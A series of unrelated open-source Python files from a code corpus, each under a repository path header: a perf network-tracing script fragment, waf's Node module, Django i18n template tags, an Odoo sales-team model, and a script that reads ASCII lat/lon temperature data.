"debug buffer status" print "----------------------------" print "xmit Qdisc:remain:%d overflow:%d" % \ (len(tx_queue_list), of_count_tx_queue_list) print "xmit netdevice:remain:%d overflow:%d" % \ (len(tx_xmit_list), of_count_tx_xmit_list) print "receive:remain:%d overflow:%d" % \ (len(rx_skb_list), of_count_rx_skb_list) # called from perf, when it finds a correspoinding event def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm, irq, irq_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, irq_name) all_event_list.append(event_info) def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret) all_event_list.append(event_info) def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, napi, dev_name) all_event_list.append(event_info) def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = 
(name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, rc, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, rc ,dev_name) all_event_list.append(event_info) def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr, protocol, location): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, protocol, location) all_event_list.append(event_info) def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr) all_event_list.append(event_info) def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen) all_event_list.append(event_info) def handle_irq_handler_entry(event_info): (name, context, cpu, time, pid, comm, irq, irq_name) = event_info if cpu not in irq_dic.keys(): irq_dic[cpu] = [] irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time} irq_dic[cpu].append(irq_record) def handle_irq_handler_exit(event_info): (name, context, cpu, time, pid, comm, irq, ret) = event_info if cpu not in irq_dic.keys(): return irq_record = irq_dic[cpu].pop() if irq != irq_record['irq']: return irq_record.update({'irq_ext_t':time}) # if an irq doesn't include NET_RX softirq, drop. 
if 'event_list' in irq_record.keys(): irq_dic[cpu].append(irq_record) def handle_irq_softirq_raise(event_info): (name, context, cpu, time, pid, comm, vec) = event_info if cpu not in irq_dic.keys() \ or len(irq_dic[cpu]) == 0: return irq_record = irq_dic[cpu].pop() if 'event_list' in irq_record.keys(): irq_event_list = irq_record['event_list'] else: irq_event_list = [] irq_event_list.append({'time':time, 'event':'sirq_raise'}) irq_record.update({'event_list':irq_event_list}) irq_dic[cpu].append(irq_record) def handle_irq_softirq_entry(event_info): (name, context, cpu, time, pid, comm, vec) = event_info net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]} def handle_irq_softirq_exit(event_info): (name, context, cpu, time, pid, comm, vec) = event_info irq_list = [] event_list = 0 if cpu in irq_dic.keys(): irq_list = irq_dic[cpu] del irq_dic[cpu] if cpu in net_rx_dic.keys(): sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t'] event_list = net_rx_dic[cpu]['event_list'] del net_rx_dic[cpu] if irq_list == [] or event_list == 0: return rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time, 'irq_list':irq_list, 'event_list':event_list} # merge information realted to a NET_RX softirq receive_hunk_list.append(rec_data) def handle_napi_poll(event_info): (name, context, cpu, time, pid, comm, napi, dev_name) = event_info if cpu in net_rx_dic.keys(): event_list = net_rx_dic[cpu]['event_list'] rec_data = {'event_name':'napi_poll', 'dev':dev_name, 'event_t':time} event_list.append(rec_data) def handle_netif_rx(event_info): (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info if cpu not in irq_dic.keys() \ or len(irq_dic[cpu]) == 0: return irq_record = irq_dic[cpu].pop() if 'event_list' in irq_record.keys(): irq_event_list = irq_record['event_list'] else: irq_event_list = [] irq_event_list.append({'time':time, 'event':'netif_rx', 'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name}) irq_record.update({'event_list':irq_event_list}) 
irq_dic[cpu].append(irq_record) def handle_netif_receive_skb(event_info): global of_count_rx_skb_list (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info if cpu in net_rx_dic.keys(): rec_data = {'event_name':'netif_receive_skb', 'event_t':time, 'skbaddr':skbaddr, 'len':skblen} event_list = net_rx_dic[cpu]['event_list'] event_list.append(rec_data) rx_skb_list.insert(0, rec_data) if len(rx_skb_list) > buffer_budget: rx_skb_list.pop() of_count_rx_skb_list += 1 def handle_net_dev_queue(event_info): global of_count_tx_queue_list (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time} tx_queue_list.insert(0, skb) if len(tx_queue_list) > buffer_budget: tx_queue_list.pop() of_count_tx_queue_list += 1 def handle_net_dev_xmit(event_info): global of_count_tx_xmit_list (name, context, cpu, time, pid, comm, skbaddr, skblen, rc, dev_name) = event_info if rc == 0: # NETDEV_TX_OK for i in range(len(tx_queue_list)): skb = tx_queue_list[i] if skb['skbaddr'] == skbaddr: skb['xmit_t'] = time tx_xmit_list.insert(0, skb) del tx_queue_list[i] if len(tx_xmit_list) > buffer_budget: tx_xmit_list.pop() of_count_tx_xmit_list += 1 return def handle_kfree_skb(event_info): (name, context, cpu, time, pid, comm, skbaddr, protocol, location) = event_info for i in range(len(tx_queue_list)): skb = tx_queue_list[i] if skb['skbaddr'] == skbaddr: del tx_queue_list[i] return for i in range(len(tx_xmit_list)): skb = tx_xmit_list[i] if skb['skbaddr'] == skbaddr: skb['free_t'] = time tx_free_list.append(skb) del tx_xmit_list[i] return for i in range(len(rx_skb_list)): rec_data = rx_skb_list[i] if rec_data['skbaddr'] == skbaddr: rec_data.update({'handle':"kfree_skb", 'comm':comm, 'pid':pid, 'comm_t':time}) del rx_skb_list[i] return def handle_consume_skb(event_info): (name, context, cpu, time, pid, comm, skbaddr) = event_info for i in range(len(tx_xmit_list)): skb = tx_xmit_list[i] if 
skb['skbaddr'] == skbaddr: skb['free_t'] = time tx_free_list.append(skb) del tx_xmit_list[i] return def handle_skb_copy_datagram_iovec(event_info): (name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info for i in range(len(rx_skb_list)): rec_data = rx_skb_list[i] if skbaddr == rec_data['skbaddr']: rec_data.update({'handle':"skb_copy_datagram_iovec", 'comm':comm, 'pid':pid, 'comm_t':time}) del rx_skb_list[i] return
joshpfosi/gbn
refs/heads/master
.waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Node.py
11
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file import os,re,sys,shutil from waflib import Utils,Errors exclude_regs=''' **/*~ **/#*# **/.#* **/%*% **/._* **/CVS **/CVS/** **/.cvsignore **/SCCS **/SCCS/** **/vssver.scc **/.svn **/.svn/** **/BitKeeper **/.git **/.git/** **/.gitignore **/.bzr **/.bzrignore **/.bzr/** **/.hg **/.hg/** **/_MTN **/_MTN/** **/.arch-ids **/{arch} **/_darcs **/_darcs/** **/.intlcache **/.DS_Store''' split_path=Utils.split_path_unix split_path_cygwin=Utils.split_path_cygwin split_path_win32=Utils.split_path_win32 if sys.platform=='cygwin': split_path=split_path_cygwin elif Utils.is_win32: split_path=split_path_win32 class Node(object): dict_class=dict __slots__=('name','sig','children','parent','cache_abspath','cache_isdir','cache_sig') def __init__(self,name,parent): self.name=name self.parent=parent if parent: if name in parent.children: raise Errors.WafError('node %s exists in the parent files %r already'%(name,parent)) parent.children[name]=self def __setstate__(self,data): self.name=data[0] self.parent=data[1] if data[2]is not None: self.children=self.dict_class(data[2]) if data[3]is not None: self.sig=data[3] def __getstate__(self): return(self.name,self.parent,getattr(self,'children',None),getattr(self,'sig',None)) def __str__(self): return self.name def __repr__(self): return self.abspath() def __hash__(self): return id(self) def __eq__(self,node): return id(self)==id(node) def __copy__(self): raise Errors.WafError('nodes are not supposed to be copied') def read(self,flags='r',encoding='ISO8859-1'): return Utils.readf(self.abspath(),flags,encoding) def write(self,data,flags='w',encoding='ISO8859-1'): Utils.writef(self.abspath(),data,flags,encoding) def chmod(self,val): os.chmod(self.abspath(),val) def delete(self): try: try: if hasattr(self,'children'): shutil.rmtree(self.abspath()) else: os.remove(self.abspath()) except OSError ,e: if 
os.path.exists(self.abspath()): raise e finally: self.evict() def evict(self): del self.parent.children[self.name] def suffix(self): k=max(0,self.name.rfind('.')) return self.name[k:] def height(self): d=self val=-1 while d: d=d.parent val+=1 return val def listdir(self): lst=Utils.listdir(self.abspath()) lst.sort() return lst def mkdir(self): if getattr(self,'cache_isdir',None): return try: self.parent.mkdir() except OSError: pass if self.name: try: os.makedirs(self.abspath()) except OSError: pass if not os.path.isdir(self.abspath()): raise Errors.WafError('Could not create the directory %s'%self.abspath()) try: self.children except AttributeError: self.children=self.dict_class() self.cache_isdir=True def find_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur continue try: ch=cur.children except AttributeError: cur.children=self.dict_class() else: try: cur=cur.children[x] continue except KeyError: pass cur=self.__class__(x,cur) try: os.stat(cur.abspath()) except OSError: cur.evict() return None ret=cur try: os.stat(ret.abspath()) except OSError: ret.evict() return None try: while not getattr(cur.parent,'cache_isdir',None): cur=cur.parent cur.cache_isdir=True except AttributeError: pass return ret def make_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur continue if getattr(cur,'children',{}): if x in cur.children: cur=cur.children[x] continue else: cur.children=self.dict_class() cur=self.__class__(x,cur) return cur def search_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur else: try: cur=cur.children[x] except(AttributeError,KeyError): return None return cur def path_from(self,node): c1=self c2=node c1h=c1.height() c2h=c2.height() lst=[] up=0 while c1h>c2h: lst.append(c1.name) 
c1=c1.parent c1h-=1 while c2h>c1h: up+=1 c2=c2.parent c2h-=1 while id(c1)!=id(c2): lst.append(c1.name) up+=1 c1=c1.parent c2=c2.parent if c1.parent: for i in range(up): lst.append('..') else: if lst and not Utils.is_win32: lst.append('') lst.reverse() return os.sep.join(lst)or'.' def abspath(self): try: return self.cache_abspath except AttributeError: pass if not self.parent: val=os.sep elif not self.parent.name: val=os.sep+self.name else: val=self.parent.abspath()+os.sep+self.name self.cache_abspath=val return val if Utils.is_win32: def abspath(self): try: return self.cache_abspath except AttributeError: pass if not self.parent: val='' elif not self.parent.name: val=self.name+os.sep else: val=self.parent.abspath().rstrip(os.sep)+os.sep+self.name self.cache_abspath=val return val def is_child_of(self,node): p=self diff=self.height()-node.height() while diff>0: diff-=1 p=p.parent return id(p)==id(node) def ant_iter(self,accept=None,maxdepth=25,pats=[],dir=False,src=True,remove=True): dircont=self.listdir() dircont.sort() try: lst=set(self.children.keys()) except AttributeError: self.children=self.dict_class() else: if remove: for x in lst-set(dircont): self.children[x].evict() for name in dircont: npats=accept(name,pats) if npats and npats[0]: accepted=[]in npats[0] node=self.make_node([name]) isdir=os.path.isdir(node.abspath()) if accepted: if isdir: if dir: yield node else: if src: yield node if getattr(node,'cache_isdir',None)or isdir: node.cache_isdir=True if maxdepth: for k in node.ant_iter(accept=accept,maxdepth=maxdepth-1,pats=npats,dir=dir,src=src,remove=remove): yield k raise StopIteration def ant_glob(self,*k,**kw): src=kw.get('src',True) dir=kw.get('dir',False) excl=kw.get('excl',exclude_regs) incl=k and k[0]or kw.get('incl','**') reflags=kw.get('ignorecase',0)and re.I def to_pat(s): lst=Utils.to_list(s) ret=[] for x in lst: x=x.replace('\\','/').replace('//','/') if x.endswith('/'): x+='**' lst2=x.split('/') accu=[] for k in lst2: if k=='**': 
accu.append(k) else: k=k.replace('.','[.]').replace('*','.*').replace('?','.').replace('+','\\+') k='^%s$'%k try: accu.append(re.compile(k,flags=reflags)) except Exception ,e: raise Errors.WafError("Invalid pattern: %s"%k,e) ret.append(accu) return ret def filtre(name,nn): ret=[] for lst in nn: if not lst: pass elif lst[0]=='**': ret.append(lst) if len(lst)>1: if lst[1].match(name): ret.append(lst[2:]) else: ret.append([]) elif lst[0].match(name): ret.append(lst[1:]) return ret def accept(name,pats): nacc=filtre(name,pats[0]) nrej=filtre(name,pats[1]) if[]in nrej: nacc=[] return[nacc,nrej] ret=[x for x in self.ant_iter(accept=accept,pats=[to_pat(incl),to_pat(excl)],maxdepth=kw.get('maxdepth',25),dir=dir,src=src,remove=kw.get('remove',True))] if kw.get('flat',False): return' '.join([x.path_from(self)for x in ret]) return ret def is_src(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) while cur.parent: if id(cur)==y: return False if id(cur)==x: return True cur=cur.parent return False def is_bld(self): cur=self y=id(self.ctx.bldnode) while cur.parent: if id(cur)==y: return True cur=cur.parent return False def get_src(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) lst=[] while cur.parent: if id(cur)==y: lst.reverse() return self.ctx.srcnode.make_node(lst) if id(cur)==x: return self lst.append(cur.name) cur=cur.parent return self def get_bld(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) lst=[] while cur.parent: if id(cur)==y: return self if id(cur)==x: lst.reverse() return self.ctx.bldnode.make_node(lst) lst.append(cur.name) cur=cur.parent lst.reverse() if lst and Utils.is_win32 and len(lst[0])==2 and lst[0].endswith(':'): lst[0]=lst[0][0] return self.ctx.bldnode.make_node(['__root__']+lst) def find_resource(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.get_bld().search_node(lst) if not node: self=self.get_src() node=self.find_node(lst) if node: if os.path.isdir(node.abspath()): 
return None return node def find_or_declare(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.get_bld().search_node(lst) if node: if not os.path.isfile(node.abspath()): node.sig=None node.parent.mkdir() return node self=self.get_src() node=self.find_node(lst) if node: if not os.path.isfile(node.abspath()): node.sig=None node.parent.mkdir() return node node=self.get_bld().make_node(lst) node.parent.mkdir() return node def find_dir(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.find_node(lst) try: if not os.path.isdir(node.abspath()): return None except(OSError,AttributeError): return None return node def change_ext(self,ext,ext_in=None): name=self.name if ext_in is None: k=name.rfind('.') if k>=0: name=name[:k]+ext else: name=name+ext else: name=name[:-len(ext_in)]+ext return self.parent.find_or_declare([name]) def bldpath(self): return self.path_from(self.ctx.bldnode) def srcpath(self): return self.path_from(self.ctx.srcnode) def relpath(self): cur=self x=id(self.ctx.bldnode) while cur.parent: if id(cur)==x: return self.bldpath() cur=cur.parent return self.srcpath() def bld_dir(self): return self.parent.bldpath() def get_bld_sig(self): try: return self.cache_sig except AttributeError: pass if not self.is_bld()or self.ctx.bldnode is self.ctx.srcnode: self.sig=Utils.h_file(self.abspath()) self.cache_sig=ret=self.sig return ret pickle_lock=Utils.threading.Lock() class Nod3(Node): pass
iguzu/gae-django
refs/heads/master
django/templatetags/i18n.py
9
import re from django.template import Node, Variable, VariableNode, _render_value_in_context from django.template import TemplateSyntaxError, TokenParser, Library from django.template import TOKEN_TEXT, TOKEN_VAR from django.utils import translation from django.utils.encoding import force_unicode register = Library() class GetAvailableLanguagesNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): from django.conf import settings context[self.variable] = [(k, translation.ugettext(v)) for k, v in settings.LANGUAGES] return '' class GetCurrentLanguageNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): context[self.variable] = translation.get_language() return '' class GetCurrentLanguageBidiNode(Node): def __init__(self, variable): self.variable = variable def render(self, context): context[self.variable] = translation.get_language_bidi() return '' class TranslateNode(Node): def __init__(self, value, noop): self.value = Variable(value) self.noop = noop def render(self, context): value = self.value.resolve(context) if self.noop: return value else: return _render_value_in_context(translation.ugettext(value), context) class BlockTranslateNode(Node): def __init__(self, extra_context, singular, plural=None, countervar=None, counter=None): self.extra_context = extra_context self.singular = singular self.plural = plural self.countervar = countervar self.counter = counter def render_token_list(self, tokens): result = [] vars = [] for token in tokens: if token.token_type == TOKEN_TEXT: result.append(token.contents) elif token.token_type == TOKEN_VAR: result.append(u'%%(%s)s' % token.contents) vars.append(token.contents) return ''.join(result), vars def render(self, context): tmp_context = {} for var, val in self.extra_context.items(): tmp_context[var] = val.render(context) # Update() works like a push(), so corresponding context.pop() is at # the end of function context.update(tmp_context) 
singular, vars = self.render_token_list(self.singular) if self.plural and self.countervar and self.counter: count = self.counter.resolve(context) context[self.countervar] = count plural, vars = self.render_token_list(self.plural) result = translation.ungettext(singular, plural, count) else: result = translation.ugettext(singular) # Escape all isolated '%' before substituting in the context. result = re.sub(u'%(?!\()', u'%%', result) data = dict([(v, _render_value_in_context(context[v], context)) for v in vars]) context.pop() return result % data def do_get_available_languages(parser, token): """ This will store a list of available languages in the context. Usage:: {% get_available_languages as languages %} {% for language in languages %} ... {% endfor %} This will just pull the LANGUAGES setting from your setting file (or the default settings) and put it into the named variable. """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_available_languages' requires 'as variable' (got %r)" % args return GetAvailableLanguagesNode(args[2]) def do_get_current_language(parser, token): """ This will store the current language in the context. Usage:: {% get_current_language as language %} This will fetch the currently active language and put it's value into the ``language`` context variable. """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_current_language' requires 'as variable' (got %r)" % args return GetCurrentLanguageNode(args[2]) def do_get_current_language_bidi(parser, token): """ This will store the current language layout in the context. Usage:: {% get_current_language_bidi as bidi %} This will fetch the currently active language's layout and put it's value into the ``bidi`` context variable. 
True indicates right-to-left layout, otherwise left-to-right """ args = token.contents.split() if len(args) != 3 or args[1] != 'as': raise TemplateSyntaxError, "'get_current_language_bidi' requires 'as variable' (got %r)" % args return GetCurrentLanguageBidiNode(args[2]) def do_translate(parser, token): """ This will mark a string for translation and will translate the string for the current language. Usage:: {% trans "this is a test" %} This will mark the string for translation so it will be pulled out by mark-messages.py into the .po files and will run the string through the translation engine. There is a second form:: {% trans "this is a test" noop %} This will only mark for translation, but will return the string unchanged. Use it when you need to store values into forms that should be translated later on. You can use variables instead of constant strings to translate stuff you marked somewhere else:: {% trans variable %} This will just try to translate the contents of the variable ``variable``. Make sure that the string in there is something that is in the .po file. """ class TranslateParser(TokenParser): def top(self): value = self.value() if self.more(): if self.tag() == 'noop': noop = True else: raise TemplateSyntaxError, "only option for 'trans' is 'noop'" else: noop = False return (value, noop) value, noop = TranslateParser(token.contents).top() return TranslateNode(value, noop) def do_block_translate(parser, token): """ This will translate a block of text with parameters. Usage:: {% blocktrans with foo|filter as bar and baz|filter as boo %} This is {{ bar }} and {{ boo }}. {% endblocktrans %} Additionally, this supports pluralization:: {% blocktrans count var|length as count %} There is {{ count }} object. {% plural %} There are {{ count }} objects. {% endblocktrans %} This is much like ngettext, only in template syntax. 
""" class BlockTranslateParser(TokenParser): def top(self): countervar = None counter = None extra_context = {} while self.more(): tag = self.tag() if tag == 'with' or tag == 'and': value = self.value() if self.tag() != 'as': raise TemplateSyntaxError, "variable bindings in 'blocktrans' must be 'with value as variable'" extra_context[self.tag()] = VariableNode( parser.compile_filter(value)) elif tag == 'count': counter = parser.compile_filter(self.value()) if self.tag() != 'as': raise TemplateSyntaxError, "counter specification in 'blocktrans' must be 'count value as variable'" countervar = self.tag() else: raise TemplateSyntaxError, "unknown subtag %s for 'blocktrans' found" % tag return (countervar, counter, extra_context) countervar, counter, extra_context = BlockTranslateParser(token.contents).top() singular = [] plural = [] while parser.tokens: token = parser.next_token() if token.token_type in (TOKEN_VAR, TOKEN_TEXT): singular.append(token) else: break if countervar and counter: if token.contents.strip() != 'plural': raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags inside it" while parser.tokens: token = parser.next_token() if token.token_type in (TOKEN_VAR, TOKEN_TEXT): plural.append(token) else: break if token.contents.strip() != 'endblocktrans': raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents return BlockTranslateNode(extra_context, singular, plural, countervar, counter) register.tag('get_available_languages', do_get_available_languages) register.tag('get_current_language', do_get_current_language) register.tag('get_current_language_bidi', do_get_current_language_bidi) register.tag('trans', do_translate) register.tag('blocktrans', do_block_translate)
blaggacao/OpenUpgrade
refs/heads/8.0
addons/sales_team/sales_team.py
75
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from datetime import date, datetime
from dateutil import relativedelta

from openerp import tools
from openerp.osv import fields, osv


class crm_case_section(osv.osv):
    """Sales team model.

    A hierarchical (parent/child) team of salespeople.  Inherits the mail
    thread and need-action mixins so teams can carry discussion threads
    and pending-action counters.
    """
    _name = "crm.case.section"
    _inherit = ['mail.thread', 'ir.needaction_mixin']
    _description = "Sales Teams"
    _order = "complete_name"
    # Number of months shown by the sparkline bar widgets built with
    # __get_bar_values (current month plus the previous four).
    _period_number = 5

    def get_full_name(self, cr, uid, ids, field_name, arg, context=None):
        # Function-field getter for 'complete_name': reuses name_get, which
        # prepends the parent chain ("Parent / Child").
        return dict(self.name_get(cr, uid, ids, context=context))

    def __get_bar_values(self, cr, uid, obj, domain, read_fields, value_field, groupby_field, context=None):
        """ Generic method to generate data for bar chart values using SparklineBarWidget.
            This method performs obj.read_group(cr, uid, domain, read_fields, groupby_field).

            :param obj: the target model (i.e. crm_lead)
            :param domain: the domain applied to the read_group
            :param list read_fields: the list of fields to read in the read_group
            :param str value_field: the field used to compute the value of the bar slice
            :param str groupby_field: the fields used to group

            :return list section_result: a list of dicts: [
                                                { 'value': (int) bar_column_value,
                                                  'tooltip': (str) bar_column_tooltip,
                                                }
                                            ]
        """
        month_begin = date.today().replace(day=1)
        # Pre-fill one zero-valued slot per month, oldest first, so months
        # with no records still show an (empty) bar.
        section_result = [{
            'value': 0,
            'tooltip': tools.ustr((month_begin + relativedelta.relativedelta(months=-i)).strftime('%B %Y')),
        } for i in range(self._period_number - 1, -1, -1)]
        group_obj = obj.read_group(cr, uid, domain, read_fields, groupby_field, context=context)
        # The groupby domain values are formatted differently for date vs
        # datetime fields; pick the matching parse pattern.
        pattern = tools.DEFAULT_SERVER_DATE_FORMAT if obj.fields_get(cr, uid, groupby_field)[groupby_field]['type'] == 'date' else tools.DEFAULT_SERVER_DATETIME_FORMAT
        for group in group_obj:
            group_begin_date = datetime.strptime(group['__domain'][0][2], pattern)
            month_delta = relativedelta.relativedelta(month_begin, group_begin_date)
            # Map the group's month back onto its slot in section_result.
            section_result[self._period_number - (month_delta.months + 1)] = {'value': group.get(value_field, 0), 'tooltip': group.get(groupby_field, 0)}
        return section_result

    _columns = {
        'name': fields.char('Sales Team', size=64, required=True, translate=True),
        # Computed "Parent / Child" display name, stored for ordering.
        'complete_name': fields.function(get_full_name, type='char', size=256, readonly=True, store=True),
        'code': fields.char('Code', size=8),
        'active': fields.boolean('Active', help="If the active field is set to "\
                        "true, it will allow you to hide the sales team without removing it."),
        'change_responsible': fields.boolean('Reassign Escalated', help="When escalating to this team override the salesman with the team leader."),
        'user_id': fields.many2one('res.users', 'Team Leader'),
        'member_ids': fields.many2many('res.users', 'sale_member_rel', 'section_id', 'member_id', 'Team Members'),
        'reply_to': fields.char('Reply-To', size=64, help="The email address put in the 'Reply-To' of all emails sent by Odoo about cases in this sales team"),
        'parent_id': fields.many2one('crm.case.section', 'Parent Team'),
        'child_ids': fields.one2many('crm.case.section', 'parent_id', 'Child Teams'),
        'note': fields.text('Description'),
        'working_hours': fields.float('Working Hours', digits=(16, 2)),
        'color': fields.integer('Color Index'),
    }

    _defaults = {
        'active': 1,
    }

    _sql_constraints = [
        ('code_uniq', 'unique (code)', 'The code of the sales team must be unique !')
    ]

    # Guard against cycles in the parent_id hierarchy.
    _constraints = [
        (osv.osv._check_recursion, 'Error ! You cannot create recursive Sales team.', ['parent_id'])
    ]

    def name_get(self, cr, uid, ids, context=None):
        """Overrides orm name_get method.

        Returns "<parent name> / <team name>" for teams that have a parent,
        plain team name otherwise.
        """
        if not isinstance(ids, list):
            ids = [ids]
        res = []
        if not ids:
            return res
        reads = self.read(cr, uid, ids, ['name', 'parent_id'], context)
        for record in reads:
            name = record['name']
            if record['parent_id']:
                # NOTE(review): only one level of parent is prefixed here;
                # deeper chains rely on the parent's own stored name.
                name = record['parent_id'][1] + ' / ' + name
            res.append((record['id'], name))
        return res


class res_partner(osv.Model):
    # Link a partner to its sales team.
    _inherit = 'res.partner'
    _columns = {
        'section_id': fields.many2one('crm.case.section', 'Sales Team'),
    }


class res_users(osv.Model):
    # Give each user a default sales team, and let users edit it themselves.
    _inherit = 'res.users'
    _columns = {
        'default_section_id': fields.many2one('crm.case.section', 'Default Sales Team'),
    }

    def __init__(self, pool, cr):
        init_res = super(res_users, self).__init__(pool, cr)
        # duplicate list to avoid modifying the original reference
        self.SELF_WRITEABLE_FIELDS = list(self.SELF_WRITEABLE_FIELDS)
        self.SELF_WRITEABLE_FIELDS.extend(['default_section_id'])
        return init_res
KMFleischer/PyEarthScience
refs/heads/master
Transition_examples_NCL_to_PyNGL/read_data/TRANS_read_ASCII_lat_lon_value_way2.py
1
# # File: # TRANS_read_ASCII_lat_lon_value_way2.py # # Synopsis: # Illustrates how to read an ASCII file and create a # contour fill plot on a map # # Categories: # I/O # contour plot # map plot # # Author: # Karin Meier-Fleischer, based on NCL example # # Date of initial publication: # September 2018 # # Description: # This example shows how to read an ASCII file and # create a contour fill plot on a map. # # Effects illustrated: # o Read ASCII data # o Drawing contours # o Drawing a map # # Output: # - # # Notes: The data for this example can be downloaded from # http://www.ncl.ucar.edu/Document/Manuals/NCL_User_Guide/Data/ # """ Transition Guide Python Example: TRANS_read_ASCII_lat_lon_value_way2.py based on read_asc6.ncl: http://ncl.ucar.edu/Applications/Scripts/read_asc6.ncl - read ASCII file asc6.txt - retrieve variable informations - draw contours on a map asc6.txt Lat Lon Temp (C) 33.3 76.5 20.3 33.3 76.6 20.3 33.3 76.7 21.5 33.3 76.8 20.0 ..... 2018-08-27 kmf """ from __future__ import print_function import numpy as np print("") #-- read the data f = open("asc6.txt",'r') data = f.readlines() #-- data: type list nrows = len(data) #-- assign lists to append elements lat0 = [] lon0 = [] vals = [] for i in data[1::]: line = i.strip() print(line) cols = line.split() lat0.append(cols[0]) lon0.append(cols[1]) vals.append(cols[2]) #-- convert string to float print(len(lat0)) print(len(lon0)) print(len(vals)) lat0 = np.array(lat0).astype(float) lon0 = np.array(lon0).astype(float) temp1d = np.array(vals).astype(float) indeqlat = np.array(np.where(lat0 == lat0[0])) print(type(indeqlat)) nlons = indeqlat.shape #-- number of longitudes nlons = nlons[1] #-- number of longitudes nlats = nrows / nlons #-- number of latitude lat = lat0[::nlons] lon = lon0[0:nlons] #setattr(lat, 'units', 'degrees_north') #setattr(lon, 'units', 'degrees_east') #-- rows by column print("--> nlats: " + str(len(lat))) print("--> nlons: " + str(len(lon))) print("--> rank of vals: " + 
str(len(temp1d.shape))) print("--> shape temp1d: " + str(temp1d.shape)) temp2d = np.reshape(temp1d,(nlats,nlons)) #setattr(temp2d, 'units', 'degC') #setattr(telp2d, 'long_name', 'temperature') print("--> shape temp2d: " + str(temp2d)) print("--> shape temp2d: " + str(temp2d.shape)) exit()
ChanderG/scikit-learn
refs/heads/master
sklearn/cluster/tests/test_k_means.py
132
